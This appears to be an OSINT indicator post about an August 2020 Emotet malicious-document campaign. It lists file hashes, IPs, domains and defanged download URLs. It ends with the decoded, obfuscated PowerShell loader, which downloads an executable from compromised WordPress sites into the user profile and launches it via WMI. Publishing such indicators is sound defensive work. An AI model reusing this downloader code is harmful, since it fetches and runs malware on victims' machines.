Emotet_Doc_out_2020-08-09_14_12.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4.  
5. fb395af7fd0491664d78c7785fea4911db3975e4a091bc5eddc50b0f3ac0fa70
6. 15be7667cc3b8d6445b3b4c245f2befdcf7a96e438a771828ca1ed6c12682670
7. 56aea8dd28bb9f893ec49cf3e5bd73eb7dafad62fb12c5f1431b94e2bbd02986
8. c60d19c1d07964063c3fc9afa7a3ea1d438eea8702ac3157866a7fb7a5188af6
9. b672f5abfd74991cf8744157fc0642f98c9e09c872d637548b932582b74cc4b5
10. cede25e4801348361a934627a1928932140f56021e2f05723e90924a37a2501c
11. 3ec975d212b214553bac033787cb72d8310c493b5261f76b8ba3b5421b9f31e1
12. 7b7b33a7dbd6566a73bbab5bdb8a4fb6f5aa2655095adc97b72e22b5f09a8f43
13. 0731aa8c16ac6d1cd66d19ed7059f68747efdde349b8dad3151b981cac519407
14. d95a095f1cf9bdfaa08a2f69b690d0a9ab88aeb363b878d2fc63e4cf35f7e055
15. 6ada89dcdbab52f4e6a27eda3a1b47a604b2e57b5ebe4f502a172431535a45c4
16. d3c7b17eb10b73fa3e2c519f2e78fbf3d2fc0ceca12fa1eb7b6d2f2b550ee3ec
17. 820da17a8eaff8c82447bb2f72f514fa4c888a082a33c65e33c1333eca90c39d
18. 73a3928db928299dd820e0673e47b3ba4173c06c8c22c488567d1999d11f9033
19. f43b44e247e702710aebe9ba02ffca511b4dcc85f9e09baf16e21cdcb979894e
20. 65fb2416ca1ef5a5608ec7a020d3d3cf348b0521b65fdf537196f704e82b522b
21. 851d6a216a5ec8b775ddf5115ccf0c8dfe054e62e5300fd06c00cdd6baa0ad31
22. 4bcbb791a6e7d82ef06350e13ea403604b25e2c73afac036748a8c9277a108c6
23. 5fd98ef53003b4fab6d28929bf2c15e32709841ae3b1e4b0e33298e2c08f4d2e
24. 3df37575881de839c3081ff758ae6a8934f896042b207f3cbd1a093682054f9a
25. 048934d8125d2f5bc8c0e4ee1efd9e76070c1396a48ec3da60331ae4e0184454
26. 01cc906c67b7436474d8fce8e59fe79f0eef205a2b295a0c1d80b27415dc7162
27. 82b25f195db0033b5d1705ff3d18a635a7bfdae1a8b5ef2043f98b4dfedbd74f
28. 0f51bd6a3a308265260a1e3b6b77c6886284ad6cfbdf187e65f120e3c834c0ee
29. 6c25dc35fcd4cd4a6eb507f1766e45f8fec7d5520b055e955f5ddb4e126992de
30. 047cdf9813da040d37e8458e3ce5f2147172c8ae77b7cf1a866e2e95f04b734a
31. 723cb4ac47080e46d544823dc316da29065687e855c74b5d5231a426ef4779ed
32. e0cc86bcee2fc0083454ada1ccbdf90a186feb91671fbb7f47e3a0bb25f490ae
33. 64ae75176c5209a4580904f8abb0325b3bcf67c934861febea1b64232c4efaa0
34. 445f2dd9223b8d46bfc36d19ddadabfebee56b41cd963badb1767ba5f8e8c67e
35. 102266027b14b1295af406042f9b99a74c506535cd93bd0ba856950cf0f539b3
36. 20cace41504cccaaa0cf3e251afb734ca463b422f87d08c3075233abcc604d82
37. de2c0d155018df39b6034698ea9c4b08c4abba8900d1fc8c386b299d49abe792
38.  
39.  
40. IPs:
41. 104.18.60.10
42. 104.18.61.10
43. 104.31.82.74
44. 104.31.83.74
45. 172.67.142.151
46. 172.67.221.115
47. 23.198.171.168
48. 23.74.50.62
49. 68.66.224.31
50.  
51. Domains:
52.  
53. csmbuildersllc.com
54. deservingveterans.com
55. eldiosstore.com
56. luckyme247.com
57. vandamebuilders.com
58.  
59.  
60. hxxp://eldiosstore.com/css/qpfv_e_y3lk0sp6i/
61. hxxp://luckyme247.com/wp-admin/qawpw_v1_ghe1wmzxzc/
62. hxxp://vandamebuilders.com/wp-admin/e2ky_18j8_wn4v/
63. hxxp://deservingveterans.com/wp-admin/fy_4bqe_zu6ew/
64. hxxp://csmbuildersllc.com/wp-admin/teqvm_n0yai_84/
65.  
66.  
67. Decoded Base64 Powershell:
68. $KECNCnmc='BXJMJghb';
69. [Net.ServicePointManager]::"SecUrITyp`R`oto`col" = 'tls12, tls11, tls';
70. $VOZLMopw = '543';
71. $OULKAgdo='NICIAfce';
72. $IAMPLbal=$env:userprofile+'\'+$VOZLMopw+'.exe';
73. $VXZCJfyo='IETDKzhh';
74. $VGSWPiko=&('new'+'-ob'+'je'+'ct') nEt.wEBCLiEnt;
75. $EGNLMfyc='hxxp://eldiosstore.com/css/qpfv_e_y3lk0sp6i/
76. hxxp://luckyme247.com/wp-admin/qawpw_v1_ghe1wmzxzc/
77. hxxp://vandamebuilders.com/wp-admin/e2ky_18j8_wn4v/
78. hxxp://deservingveterans.com/wp-admin/fy_4bqe_zu6ew/
79. hxxp://csmbuildersllc.com/wp-admin/teqvm_n0yai_84/'."S`plit"([char]42);
80. $YTBGZzto='ZPIGGbig';
81. foreach($YUQXWfmi in $EGNLMfyc){try{$VGSWPiko."dOwnL`O`Adfi`LE"($YUQXWfmi, $IAMPLbal);
82. $ILLGLmqu='ZJYCBtae';
83. If ((.('Get'+'-'+'Item') $IAMPLbal)."leN`G`TH" -ge 28766) {([wmiclass]'win32_Process')."c`ReA`TE"($IAMPLbal);
84. $OYAJUrzy='BXSUDjyv';
85. break;
86. $SHOPFptf='XOPGCqlr'}}catch{}}$ICROMojs='HOUSDxhm'
87.